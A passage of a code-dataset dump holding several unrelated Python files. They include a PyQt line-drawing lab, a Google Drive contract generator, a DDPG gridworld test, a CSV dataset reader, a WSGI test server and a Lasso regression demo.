sign(dx)\n sy = sign(dy)\n\n dx = abs(dx)\n dy = abs(dy)\n\n flag = 0\n\n if not (dx > dy):\n flag = 1\n dx, dy = dy, dx\n\n e = 2 * dy - dx\n\n for i in range(dx + 1):\n painter.drawPoint(QPoint(x, y))\n\n if e >= 0:\n if flag == 0:\n y += sy\n else:\n x += sx\n\n e -= 2 * dx\n\n if flag == 0:\n x += sx\n else:\n y += sy\n\n e += 2 * dy\n\n\ndef alg_b_real_numb(painter, xn, yn, xk, yk):\n # В процессе работы одна из координат - либо х,\n # либо у(в зависимости от углового коэффициента) - изменяктся на единицу.\n # Изменение другой координаты ( либо на нуль, либо на единицу)\n # зависит от расстояния между действительным положением отрезка и\n # ближайшими координатными сетками.\n\n # 0.5 <= dy/dx <= 1 (ошибка >= 0)\n # 0 <= dy/dx < 0.5 (ошибка < 0)\n\n # Нужно проверять только знак ошибки\n # ошибка >= 0 - подняться на пиксель\n # ошибка < 0 - не изменяться\n\n # ошибка - это интервал, отсекаемый рассматриваемым отрезком\n # в каждом растровом элементе\n\n x = xn\n y = yn\n\n dx = xk - xn\n dy = yk - yn\n\n sx = sign(dx)\n sy = sign(dy)\n\n dx = abs(dx)\n dy = abs(dy)\n\n flag = 0\n\n if not (dx > dy):\n flag = 1\n dx, dy = dy, dx\n\n # угловой коэффициент\n m = dy / dx\n # значение ошибки\n e = m - 0.5\n\n for i in range(dx + 1):\n painter.drawPoint(QPoint(x, y))\n\n if e >= 0:\n if flag == 0:\n y += sy\n else:\n x += sx\n\n e -= 1\n \n if flag == 0:\n x += sx\n else:\n y += sy\n\n e += m\n\n\ndef alg_b_modified(painter, xn, yn, xk, yk):\n\n # Идея состоит в сглаживании резких переходов от ступени к ступени.\n # Сглаживание основывается на том, что каждый пиксель высвечивается\n # со своим уровнем интенсивности.\n # Уровень выбирается пропорционально площади части пикселя.\n\n # Интенсивность I~Si площади\n\n I = 255 # Число доступных уровней интенс��вности\n\n x = xn\n y = yn\n\n dx = xk - xn\n dy = yk - yn\n\n sx = sign(dx)\n sy = sign(dy)\n\n dx = abs(dx)\n dy = abs(dy)\n\n flag = 0\n\n if not (dx > dy):\n flag = 1\n dx, dy = dy, dx\n\n # Тангенса угла наклона\n m = dy / dx\n\n # Весовой коэффициент\n W = 1 - m\n\n # Ошибка\n e = 0.5\n\n a = round(I * e)\n\n # plot(X, Y, m / 2);\n pen = painter.pen()\n color = pen.color()\n color.setAlpha(a)\n\n pen.setColor(color)\n painter.setPen(pen)\n\n painter.drawPoint(QPoint(x, y))\n\n for i in range(dx + 1):\n\n pen = painter.pen()\n color = pen.color()\n color.setAlpha(a)\n\n pen.setColor(color)\n painter.setPen(pen)\n\n painter.drawPoint(QPoint(x, y))\n\n if e < W:\n if flag:\n y += sy\n else:\n x += sx\n e += m\n else:\n y += sy\n x += sx\n e -= W\n\n a = round(I * e)\n\n\ndef alg_cda(painter, xn, yn, xk, yk):\n\n # Полагаем боьшее из приращений по dx или dy равным единицы растра\n\n if abs(xk - xn) >= abs(yk - yn):\n l = abs(xk - xn)\n else:\n l = abs(yk - yn)\n\n # l - Длинна\n\n # Округление\n\n px = round((xk - xn) / l)\n py = round((yk - yn) / l)\n\n # Исрользование знаковых функций для разных квадрантов\n\n x = xn + 0.5 * sign(px)\n y = yn + 0.5 * sign(py)\n\n i = 1\n\n while i <= l:\n painter.drawPoint(QPoint(x, y))\n x += px\n y += py\n i += 1\n\n\ndef alg_lib(painter, xn, yn, xk, yk):\n painter.drawLine(xn, yn, xk, yk)\n\n\nclass RenderArea(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.points = None\n\n self.algorithm = alg_b_real_numb\n self.algorithms = {0: alg_b_real_numb,\n 1: alg_b_whole_numb,\n 2: alg_b_modified,\n 3: alg_cda,\n 4: alg_lib}\n\n self.color = Qt.black\n self.colors = {0: Qt.black,\n 1: Qt.red,\n 2: Qt.green,\n 3: Qt.blue,\n 4: Qt.yellow}\n\n self.pixmap = QPixmap(self.size()).scaled(800, 600, Qt.IgnoreAspectRatio)\n self.pixmap.fill(Qt.transparent)\n\n self.setBackgroundRole(QPalette.Base)\n self.setAutoFillBackground(True)\n\n def minimumSizeHint(self):\n return QSize(800, 600)\n\n def sizeHint(self):\n return QSize(800, 600)\n\n def clean_all(self):\n self.pixmap = QPixmap(self.size())\n self.pixmap.fill(Qt.transparent)\n\n self.update()\n\n def createSun(self, col, alg):\n\n xb = self.width() / 4\n xe = xb * 3\n\n yb = self.height() / 2\n ye = self.height() / 2\n\n xc = self.width() / 2\n yc = self.height() / 2\n\n fi = 30\n \n for i in range(12):\n self.createLine(round(xb), round(yb), round(xe), round(ye), col, alg)\n \n new_x = xc + (xb - xc)*cos(radians(fi)) + (yb - yc)*sin(radians(fi)) \n new_y = yc - (xb - xc)*sin(radians(fi)) + (yb - yc)*cos(radians(fi))\n xb = new_x\n yb = new_y\n\n new_x = xc + (xe - xc)*cos(radians(fi)) + (ye - yc)*sin(radians(fi)) \n new_y = yc - (xe - xc)*sin(radians(fi)) + (ye - yc)*cos(radians(fi))\n xe = new_x\n ye = new_y\n\n def createLine(self, xb, yb, xe, ye, color, alg):\n self.color = self.colors[color]\n self.points = [(xb, yb,), (xe, ye)]\n self.algorithm = self.algorithms[alg]\n\n self.drawLine()\n\n def drawLine(self):\n p = QPainter(self.pixmap)\n pen = QPen(self.color)\n p.setPen(pen)\n self.algorithm(p, self.points[0][0], self.points[0][1],\n self.points[1][0], self.points[1][1])\n\n p.end()\n\n self.update()\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.drawPixmap(QPoint(), self.pixmap)\n\n\nclass Window(QWidget):\n\n def __init__(self):\n super(Window, self).__init__()\n\n self.renderArea = RenderArea()\n\n self.alg = 0\n\n # Labels\n\n lineLabel = QLabel(\"Линия\")\n lineLabel.setAlignment(Qt.AlignHCenter)\n beginLabel = QLabel(\"Координаты начала линии.\")\n beginLabel.setAlignment(Qt.AlignHCenter)\n endLabel = QLabel(\"Координаты конца линии.\")\n endLabel.setAlignment(Qt.AlignHCenter)\n\n # Edit\n\n self.xbEdit = QLineEdit()\n self.xbEdit.setFixedWidth(30)\n self.ybEdit = QLineEdit()\n self.ybEdit.setFixedWidth(30)\n self.xeEdit = QLineEdit()\n self.xeEdit.setFixedWidth(30)\n self.yeEdit = QLineEdit()\n self.yeEdit.setFixedWidth(30)\n\n # QComboBox\n\n self.colorComboBox = QComboBox()\n self.colorComboBox.addItem(\"Черный\", 0)\n self.colorComboBox.addItem(\"Красный\", 1)\n self.colorComboBox.addItem(\"Зеленый\", 2)\n self.colorComboBox.addItem(\"Синий\", 3)\n self.colorComboBox.addItem(\"Желтый\", 4)\n\n colorLabel = QLabel(\"&Цвет:\")\n colorLabel.setAlignment(Qt.AlignRight)\n colorLabel.setBuddy(self.colorComboBox)\n\n # Radio Button\n\n rb_0 = QRadioButton('Алгоритм Брезенхема\\n c действительными числами')\n rb_0.setChecked(True)\n rb_0.toggled.connect(lambda: self.but_rest(0))\n rb_1 = QRadioButton('Алгоритм Брезенхема\\n с целыми числами')\n rb_1.toggled.connect(lambda: self.but_rest(1))\n rb_2 = QRadioButton('Алгоритм Брезенхема\\n с устранением ступенчатости')\n rb_2.toggled.connect(lambda: self.but_rest(2))\n rb_3 = QRadioButton('CDA')\n rb_3.toggled.connect(lambda: self.but_rest(3))\n rb_4 = QRadioButton('Библиотечный алгоритм')\n rb_4.toggled.connect(lambda: self.but_rest(4))\n\n # Buttons\n\n drawButton = QPushButton(\"Отрисовать\")\n testButton = QPushButton(\"Тест\")\n cleanButton = QPushButton(\"Очистить\")\n\n # Connection\n\n drawButton.clicked.connect(self.drawButtonClicked)\n testButton.clicked.connect(self.testButtonClicked)\n cleanButton.clicked.connect(self.cleanButtonClicked)\n\n # layout\n\n mainLayout = QGridLayout()\n\n # Right Layout\n\n rightLayout = QGridLayout()\n rightLayout_2 = QGridLayout()\n\n rightLayout.addWidget(beginLabel, 0, 0, 1, 4)\n\n rightLayout.addWidget(QLabel(\"x = \"), 1, 0, Qt.AlignRight)\n rightLayout.addWidget(self.xbEdit, 1, 1) # , Qt.AlignRight)\n rightLayout.addWidget(QLabel(\"y = \"), 1, 2, Qt.AlignRight)\n rightLayout.addWidget(self.ybEdit, 1, 3) # , Qt.AlignRight)\n\n rightLayout.addWidget(endLabel, 2, 0, 1, 4)\n\n rightLayout.addWidget(QLabel(\"x = \"), 3, 0, Qt.AlignRight)\n rightLayout.addWidget(self.xeEdit, 3, 1) # , Qt.AlignRight)\n rightLayout.addWidget(QLabel(\"y = \"), 3, 2, Qt.AlignRight)\n rightLayout.addWidget(self.yeEdit, 3, 3) # , Qt.AlignRight)\n\n # right layout 2\n\n rightLayout_2.addWidget(colorLabel, 0, 0, 1, 1)\n rightLayout_2.addWidget(self.colorComboBox, 0, 1, 1, 3)\n rightLayout_2.addWidget(rb_0, 1, 0, 1, 4)\n rightLayout_2.addWidget(rb_1, 2, 0, 1, 4)\n rightLayout_2.addWidget(rb_2, 3, 0, 1, 4)\n rightLayout_2.addWidget(rb_3, 4, 0, 1, 4)\n rightLayout_2.addWidget(rb_4, 5, 0, 1, 4)\n\n # Group Box\n\n rightGB = QGroupBox(\"Координаты\")\n rightGB.setLayout(rightLayout)\n\n rightGB_2 = QGroupBox(\"Параметры\")\n rightGB_2.setLayout(rightLayout_2)\n\n rW = QWidget()\n rl = QVBoxLayout()\n rl.addWidget(lineLabel)\n rl.addWidget(rightGB)\n rl.addWidget(rightGB_2)\n rl.addWidget(drawButton)\n rl.addWidget(testButton)\n rl.addWidget(cleanButton)\n rW.setLayout(rl)\n\n # Main Window\n\n mainLayout.setColumnStretch(0, 3)\n mainLayout.addWidget(self.renderArea, 0, 0, 4, 4)\n\n mainLayout.addWidget(rW, 0, 4) # rightGB, 0, 4)\n\n self.setLayout(mainLayout)\n\n self.setGeometry(500, 300, 800, 600)\n self.setWindowTitle(\"Lab_03\")\n\n def drawButtonClicked(self):\n\n try:\n xb = float(self.xbEdit.text())\n yb = self.renderArea.height() - float(self.ybEdit.text())\n xe = float(self.xeEdit.text())\n ye = self.renderArea.height() - float(self.yeEdit.text())\n\n color = self.colorComboBox.itemData(self.colorComboBox.currentIndex())\n\n self.renderArea.createLine(round(xb), round(yb),\n round(xe), round(ye), color, self.alg)\n\n except ValueError:\n msg = QMessageBox(self)\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\"Некорректное заполнение полей\")\n msg.setWindowTitle(\"Ошибка заполнения полей\")\n msg.setStandardButtons(QMessageBox.Ok)\n msg.show()\n\n def testButtonClicked(self):\n color = self.colorComboBox.itemData(self.colorComboBox.currentIndex())\n self.renderArea.createSun(color, self.alg)\n \n def cleanButtonClicked(self):\n self.renderArea.clean_all()\n \n def but_rest(self, n):\n self.alg = n\n\n\nif __name__ == '__main__':\n import sys\n\n app = QApplication(sys.argv)\n window = Window()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"Computer Graphics/lab_03/lab_03.py","file_name":"lab_03.py","file_ext":"py","file_size_in_byte":14028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"481320897","text":"def contrato_dependencia(matricula_id, dependencia_id):\n import json\n import os.path\n import io\n import pickle\n import pdfkit\n import datetime\n import time\n from weasyprint import HTML, CSS\n from apiclient import discovery\n from googleapiclient.http import MediaIoBaseDownload\n from googleapiclient.http import MediaFileUpload\n from httplib2 import Http\n from oauth2client import client\n from oauth2client import file\n from oauth2client import tools\n from google_auth_oauthlib.flow import InstalledAppFlow\n from google.auth.transport.requests import Request\n\n # dependencia_id = request.vars.dependencia_id\n\n usuario_id = auth.user.id\n pessoa = db(db.pessoa.usuario == usuario_id).select().first()\n\n dependencia = db(\n (db.dependencia.id == dependencia_id) &\n (db.matriz.id == db.dependencia.matriz) &\n (db.curso.id == db.matriz.curso) &\n (db.disciplina.id == db.dependencia.disciplina) &\n (db.dependencia.calendario == db.calendario.id) &\n (db.dependencia.preco == db.preco.id)\n ).select().first()\n\n print('aqui erro')\n print(dependencia_id)\n print(dependencia)\n\n folder = request.folder\n\n # Set the scopes and discovery info\n SCOPES = ['https://www.googleapis.com/auth/drive']\n\n TOKEN = os.path.join(os.path.join(folder, 'private','token.pickle'))\n CREDENTIALS = os.path.join(os.path.join(folder, 'private','credentials.json'))\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists(TOKEN):\n with open(TOKEN, 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CREDENTIALS, SCOPES)\n creds = flow.run_local_server()\n\n # Save the credentials for the next run\n with open(TOKEN, 'wb') as token:\n pickle.dump(creds, token)\n\n drive_service = discovery.build('drive', 'v3', credentials=creds)\n docs_service = discovery.build('docs', 'v1', credentials=creds)\n\n contrato_dependencia = db(\n (db.contrato.tipo == 3) &\n (db.contrato.inicio_validade <= datetime.datetime.now()) &\n (db.contrato.fim_validade >= datetime.datetime.now())\n ).select().first()\n print(datetime.datetime.now())\n print(contrato_dependencia)\n # file_id = '1ogqWtDKWK7Yzv9kMCV_OjzXUnVQl6jdZCLdKoRgkEnY'\n file_id = contrato_dependencia.codigo_drive\n\n # customer_name = 'Alice'\n pasta_contatos_id = '18r1sUgnI_Y9Cu5ERhjkG4lkOwk_yb4nP'\n date = datetime.datetime.now().strftime(\"%y/%m/%d\")\n ano = datetime.datetime.now().strftime(\"%Y\")\n mes = datetime.datetime.now().strftime(\"%m\")\n\n curso_id = dependencia.curso.id\n\n calendario = db(\n (db.calendario.ano == ano) &\n (db.calendario.mes_inicio < mes) &\n (db.calendario.mes_fim > mes) &\n (db.calendario.nivel == 4) &\n (db.calendario.modalidade == 1)\n ).select().first()\n print(calendario)\n\n profissao = db(db.profissao.id == pessoa.profissao).select(db.profissao.nome).first()\n\n valor_parcela = dependencia.preco.valor\n parcelas = dependencia.preco.parcelamento\n\n numero_parcelas_extenso = extenso_normal(str(parcelas))\n reais_centavos = str(valor_parcela).split('.')\n reais = reais_centavos[0]\n centavos = reais_centavos[1]\n valor_parcela_extenso = extenso(reais, centavos)\n\n valor_total = valor_parcela * parcelas\n reais_centavos = str(valor_total).split('.')\n reais = reais_centavos[0]\n centavos = reais_centavos[1]\n valor_total_extenso = extenso(reais, centavos)\n\n requests = []\n requests.append(get_replace_field('pessoa.id', str(pessoa.id)))\n requests.append(get_replace_field('pessoa.nome', pessoa.nome + ' ' + pessoa.sobrenome))\n requests.append(get_replace_field('pessoa.cpf', pessoa.cpf))\n requests.append(get_replace_field('pessoa.rg', pessoa.rg))\n requests.append(get_replace_field('pessoa.endereco', pessoa.endereco))\n requests.append(get_replace_field('pessoa.numero', str(pessoa.numero)))\n requests.append(get_replace_field('pessoa.bairro', pessoa.bairro))\n requests.append(get_replace_field('pessoa.cidade', str(pessoa.cidade)))\n requests.append(get_replace_field('pessoa.uf', str(pessoa.uf)))\n requests.append(get_replace_field('pessoa.cep', pessoa.cep))\n requests.append(get_replace_field('pessoa.email', pessoa.email))\n requests.append(get_replace_field('pessoa.celular', pessoa.celular))\n requests.append(get_replace_field('pessoa.nome_social', ''))\n requests.append(get_replace_field('pessoa.nome_pai', pessoa.nome_pai))\n requests.append(get_replace_field('pessoa.nome_mae', pessoa.nome_mae))\n requests.append(get_replace_field('pessoa.nacionalidade', pessoa.nacionalidade))\n requests.append(get_replace_field('pessoa.profissao', profissao.nome))\n requests.append(get_replace_field('pessoa.estado_civil', pessoa.estado_civil))\n\n requests.append(get_replace_field('disciplina_dependencia', dependencia.disciplina.nome))\n requests.append(get_replace_field('curso', dependencia.curso.nome))\n requests.append(get_replace_field('habilitacao', dependencia.curso.descricao))\n requests.append(get_replace_field('semestre', '1' if dependencia.calendario.mes_inicio < 6 else '2' ))\n requests.append(get_replace_field('ano', str(dependencia.calendario.ano)))\n\n requests.append(get_replace_field('valor', str(valor_total)))\n requests.append(get_replace_field('valor_extenso', str(valor_total_extenso)))\n requests.append(get_replace_field('numero_parcelas', str(parcelas)))\n requests.append(get_replace_field('numero_parcelas_extenso', str(numero_parcelas_extenso)))\n requests.append(get_replace_field('valor_parcela', str(valor_parcela)))\n requests.append(get_replace_field('valor_parcela_extenso', str(valor_parcela_extenso)))\n\n # busca diretórios\n dir_contrato_id = '18r1sUgnI_Y9Cu5ERhjkG4lkOwk_yb4nP'\n\n # Busca pasta do ano atual\n dirs = drive_service.files().list(\n q=\"name='\"+ano+\"' and mimeType='application/vnd.google-apps.folder'\" \\\n \"and '\" +dir_contrato_id+ \"' in parents\"\n ).execute()\n\n # Cria pasta do ano atual caso não tenha sido criada\n if not dirs.get('files'):\n dir_ano = drive_service.files().create(\n body={\n 'mimeType':'application/vnd.google-apps.folder',\n 'parents':[dir_contrato_id],\n 'name':str(ano)\n }\n ).execute()\n dir_ano_id = dir_ano.id\n else:\n dir_ano = dirs.get('files')\n dir_ano_id = dir_ano[0]['id']\n\n # Busca pasta do curso\n dirs = drive_service.files().list(\n q=\"name='\"+str(curso_id)+\"' and mimeType='application/vnd.google-apps.folder'\" \\\n \"and '\" +dir_ano_id+ \"' in parents\"\n ).execute()\n\n # Cria pasta do curso caso não tenha sido criada\n if not dirs.get('files'):\n dir_curso = drive_service.files().create(\n body={\n 'mimeType':'application/vnd.google-apps.folder',\n 'parents':[dir_ano_id],\n 'name':str(curso_id)\n }\n ).execute()\n else:\n dir_curso = dirs.get('files')\n dir_curso_id = dir_curso[0]['id']\n\n\n new_file = drive_service.files().copy(\n body={\n 'fileId': file_id,\n 'mimeType':'application/vnd.google-apps.file',\n 'name':'contrato_'+str(pessoa.id)+'_'+str(matricula_id),\n 'parents':[dir_curso_id],\n # 'name': str(pessoa.nome + ' ' + pessoa.sobrenome)\n },\n fileId=file_id,\n ).execute()\n print ('File ID: %s' % new_file.get('id'))\n\n # subistitui campos\n result = docs_service.documents().batchUpdate(\n documentId=new_file.get('id'), body={'requests': requests}\n ).execute()\n\n documento_id = db.documento.insert(\n nome='contrato_'+str(pessoa.id)+'_'+str(matricula_id),\n arquivo=None,\n id_ged=None,\n codigo_drive=new_file.get('id')\n )\n\n db.contrato_matricula.insert(\n contrato=documento_id,\n contratante=pessoa.id,\n codigo_aceitacao=None,\n data_aceite=datetime.date.today(),\n )\n\n # definindo permissões\n permissao = drive_service.permissions().create(\n body={\n 'fileId': new_file.get('id'),\n 'role':'reader',\n 'type':'anyone',\n 'allowFileDiscovery':False,\n # 'emailAddress':''\n },\n fileId=new_file.get('id'),\n ).execute()\n\n\n\n\n return new_file.get('id')\n","sub_path":"exemplo-drive.py","file_name":"exemplo-drive.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"220169018","text":"import os\nimport sys\n\nif 'VIRTUAL_ENV' in os.environ:\n py_version = sys.version_info[:2] # formatted as X.Y\n py_infix = os.path.join('lib', ('python%d.%d' % py_version))\n virtual_site = os.path.join(os.environ.get('VIRTUAL_ENV'), py_infix, 'site-packages')\n dist_site = os.path.join('/usr', py_infix, 'dist-packages')\n\n # OPTIONAL: exclude debian-based system distributions sites\n # sys.path = filter(lambda p: not p.startswith(dist_site), sys.path)\n\n # add virtualenv site\n sys.path.insert(1, virtual_site)\n","sub_path":"dotfiles/ipython/profile_default/startup/03-virtualenvs.py","file_name":"03-virtualenvs.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"391591168","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.\n\nimport random\nimport unittest\n\nimport numpy as np\nimport torch\nfrom ml.rl.test.gridworld.gridworld_base import DISCOUNT\nfrom ml.rl.test.gridworld.gridworld_continuous import GridworldContinuous\nfrom ml.rl.test.gridworld.gridworld_evaluator import GridworldDDPGEvaluator\nfrom ml.rl.test.gridworld.gridworld_test_base import GridworldTestBase\nfrom ml.rl.thrift.core.ttypes import (\n DDPGModelParameters,\n DDPGNetworkParameters,\n DDPGTrainingParameters,\n RLParameters,\n)\nfrom ml.rl.training.ddpg_trainer import DDPGTrainer\n\n\nclass TestGridworldDdpg(GridworldTestBase):\n def setUp(self):\n self.minibatch_size = 4096\n super(self.__class__, self).setUp()\n np.random.seed(0)\n random.seed(0)\n torch.manual_seed(0)\n\n def get_ddpg_parameters(self):\n return DDPGModelParameters(\n rl=RLParameters(\n gamma=DISCOUNT,\n target_update_rate=0.5,\n reward_burnin=100,\n maxq_learning=True,\n ),\n shared_training=DDPGTrainingParameters(\n minibatch_size=self.minibatch_size,\n final_layer_init=0.003,\n optimizer=\"ADAM\",\n ),\n actor_training=DDPGNetworkParameters(\n layers=[-1, 256, 128, -1],\n activations=[\"relu\", \"relu\", \"tanh\"],\n learning_rate=0.05,\n l2_decay=0.01,\n ),\n critic_training=DDPGNetworkParameters(\n layers=[-1, 256, 256, 128, -1],\n activations=[\"relu\", \"relu\", \"relu\", \"linear\"],\n learning_rate=0.05,\n l2_decay=0.01,\n ),\n )\n\n def _test_ddpg_trainer(self, use_gpu=False, use_all_avail_gpus=False):\n self.check_tolerance = False\n self.tolerance_threshold = 1.0\n environment = GridworldContinuous()\n trainer = DDPGTrainer(\n self.get_ddpg_parameters(),\n environment.normalization,\n environment.normalization_action,\n environment.min_action_range,\n environment.max_action_range,\n use_gpu=use_gpu,\n use_all_avail_gpus=use_all_avail_gpus,\n )\n evaluator = GridworldDDPGEvaluator(environment, DISCOUNT)\n self.evaluate_gridworld(environment, evaluator, trainer, trainer, use_gpu)\n\n def test_ddpg_trainer(self):\n self._test_ddpg_trainer()\n\n @unittest.skipIf(\n not torch.cuda.is_available() or True,\n \"CUDA not available; failing on CI for reason\",\n )\n def test_ddpg_trainer_gpu(self):\n self._test_ddpg_trainer(use_gpu=True)\n\n @unittest.skipIf(not torch.cuda.is_available(), \"CUDA not available\")\n def test_ddpg_trainer_all_gpus(self):\n self._test_ddpg_trainer(use_gpu=True, use_all_avail_gpus=True)\n","sub_path":"ml/rl/test/gridworld/test_gridworld_ddpg.py","file_name":"test_gridworld_ddpg.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"193505543","text":"# ask the user for a string and print out whether the string is palindrome or not\n\nuserString = input(\"Please enter a word or phrase: \")\n\nstringForwards = []\n\n\nfor x in userString:\n\tstringForwards.append(x)\n\nstringBackwards = stringForwards[::-1]\n\nif stringForwards == stringBackwards:\n\tprint(\"That word is a palindrome\")\nelse:\n\tprint(\"That word is not a palindrome\")\n","sub_path":"Beginner-Python/One hit wonders/stringlists.py","file_name":"stringlists.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"69758578","text":"from typing import List, Iterable, Dict, Set, Callable\nfrom os import sep, system\nfrom functools import partial\nimport logging\nimport csv\n\n\nclass Row:\n '''\n Class Row represents one row in a dataset and\n is capable of getting data in specific type.\n\n For getting data from a column use one of the\n get methods.\n\n Parameters\n ----------\n mapping : Dict[str, int]\n Mapping between column names and theirs indexes.\n row : List[str]\n List of string data from a dataset\n (e.g. data retrieved from csv file).\n '''\n\n def __init__(self, mapping: Dict[str, int], row: List[str]):\n self._mapping = mapping\n self._row = row\n\n def get_raw_row(self) -> List[str]:\n return self._row\n\n def get_int_by_column(self, column: str) -> int:\n if column in self._mapping:\n return int(self._row[self._mapping[column]])\n else:\n raise KeyError(\"Column does not exist!\")\n\n def get_int_by_index(self, index: int) -> int:\n if index < len(self._row):\n return int(self._row[index])\n else:\n raise IndexError(\"Column does not exist!\")\n\n def get_float_by_column(self, column: str) -> float:\n if column in self._mapping:\n return float(self._row[self._mapping[column]])\n else:\n raise KeyError(\"Column does not exist!\")\n\n def get_float_by_index(self, index: int) -> float:\n if index < len(self._row):\n return float(self._row[index])\n else:\n raise IndexError(\"Column does not exist!\")\n\n def get_str_by_column(self, column: str) -> str:\n if column in self._mapping:\n return str(self._row[self._mapping[column]])\n else:\n raise KeyError(\"Column does not exist!\")\n\n def get_str_by_index(self, index: int) -> str:\n if index < len(self._row):\n return str(self._row[index])\n else:\n raise IndexError(\"Column does not exist!\")\n\n\nclass Dataset:\n '''\n Class Dataset represents a dataset and provides\n possibility to iterate over the dataset, so user\n does not have to care about reading from files.\n\n During a dataset creation it checks header of files\n and if some header is different then the others, it\n raises ValueError.\n\n To iterate over the dataset use one of the methods:\n - raw_data_without_header(self) -> Callable[[], Iterable[Row]]\n - provides one Iterable[Row]\n - raw_data_without_header_parallel(self, workers: int) -> List[Callable[[], Iterable[Row]]]\n - provides more Iterable[Row] based on the parameter workers\n - provides possibility to read a dataset in parallel\n\n Parameters\n ----------\n path_to_data : str\n A path to the directory where CSV files are stored.\n files_names : List[str]\n List of CSV files which should be included in the dataset.\n delimiter : str\n A delimiter for CSV files. Default value is comma \",\".\n\n Raises\n ------\n ValueError\n If the CSV files do not have the same headers.\n\n '''\n\n _logger = logging.getLogger(\"Dataset\")\n\n def __init__(self, path_to_data: str, files_names: List[str], delimiter: str = \",\"):\n self._path_to_data = path_to_data\n self._files_names = files_names\n self._delimiter = delimiter\n self._header = self._get_header(delimiter)\n\n def _get_header(self, delimiter) -> Dict[str, int]:\n header = None\n multiple_headers = False\n\n for file_name in self._files_names:\n self._logger.info(\"Checking header of file: \" + file_name)\n with open(self._path_to_data + sep + file_name) as file:\n if header is None:\n header = file.readline()[:-1].split(delimiter)\n else:\n current_header = file.readline()[:-1].split(delimiter)\n if header != current_header:\n self._logger.error(\"Different header for one dataset! Header: \" + delimiter.join(current_header))\n multiple_headers = True\n\n if multiple_headers:\n self._logger.error(\"Multiple headers for one dataset!\")\n raise ValueError(\"Multiple headers for one dataset!\")\n elif header is None:\n return dict()\n else:\n result = dict()\n for i, column in enumerate(header):\n result.update([(column, i)])\n return result\n\n def _raw_data_without_header(self, files_names: List[str]) -> Iterable[Row]:\n for file_name in files_names:\n self._logger.info(\"Reading file: \" + file_name)\n with open(self._path_to_data + sep + file_name) as file:\n skip = True\n for row in csv.reader(file, delimiter=self._delimiter):\n if skip:\n skip = False\n else:\n yield Row(self._header, row)\n\n def get_header(self) -> Set[str]:\n return set(self._header.keys())\n\n def raw_data_without_header(self) -> Callable[[], Iterable[Row]]:\n return lambda: self._raw_data_without_header(self._files_names)\n\n def raw_data_without_header_parallel(self, workers: int) -> List[Callable[[], Iterable[Row]]]:\n partition_size = int(len(self._files_names) / workers)\n\n iterators = []\n for i in range(workers - 1):\n iterators.append(partial(self._raw_data_without_header, self._files_names[i * partition_size:(i + 1) * partition_size]))\n iterators.append(partial(self._raw_data_without_header, self._files_names[(workers - 1) * partition_size:]))\n\n return iterators\n\n\nif __name__ == \"__main__\":\n # list aws\n # system(\"aws s3 ls --no-sign-request --region eu-central-1 \\\"s3://cse-cic-ids2018/\\\" --recursive --human-readable --summarize\")\n\n # download dataset\n # system(\"aws s3 cp --no-sign-request --region eu-central-1 \\\"s3://cse-cic-ids2018/Processed Traffic Data for ML Algorithms\\\" ../data_csv/ --recursive\")\n pass\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"281228517","text":"import socket\nfrom threading import Thread\n\nfrom wsgiref.simple_server import make_server\n\n\ndef choose_port():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(('localhost', 0))\n port = s.getsockname()[1]\n s.close()\n return port\n\n\nclass TestServer(object):\n def __init__(self, handler):\n self._handler = handler\n\n def _handle_request(self, environ, start_response):\n return self._handler(environ, start_response)\n\n def __enter__(self):\n self.port = choose_port()\n self.address = 'http://localhost:%i/' % self.port\n\n self._server = make_server(\n 'localhost', self.port, self._handle_request\n )\n\n self._thread = Thread(target=self._server.serve_forever)\n self._thread.start()\n\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n self._server.shutdown()\n self._thread.join()\n","sub_path":"pope_client/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"24572512","text":"# coding:utf-8\n# 罰則項付き回帰 (Lasso 回帰) のサンプルプログラム\n\nfrom sklearn.linear_model import Lasso\nimport numpy as np\nfrom sklearn.datasets import load_boston\nimport pylab as plt\nfrom mpltools import style\nstyle.use('ggplot')\n\nboston = load_boston()\nplt.scatter(boston.data[:, 5], boston.target)\n\nplt.xlabel('RM')\nplt.ylabel('House Price')\n\nx = boston.data[:, 5]\nxmin = x.min()\nxmax = x.max()\nx = np.array([[v, 1] for v in x])\ny = boston.target\n\n# 罰則項を用いない回帰. numPy で実装.\n(slope, bias), res, _, _ = np.linalg.lstsq(x, y)\nplt.plot([xmin, xmax], [slope * xmin + bias, slope * xmax + bias], ':', lw = 4)\n\nrmse = np.sqrt(res[0] / len(x))\nprint('Residual: {}'.format(rmse))\n\n# 罰則項を用いる回帰 (Lasso). scikit-learn で実装.\nlas = Lasso()\nlas.fit(x, y)\n\nprediction = np.array([las.predict(xi) for xi in x])\nerror = prediction - y\ntotal_error = np.dot(error, error)\nrmse_train = np.sqrt(total_error / len(prediction))\n# print('RMSE on training: {}'.format(rmse_train))\n\ny0 = las.predict([xmin, 1])\ny1 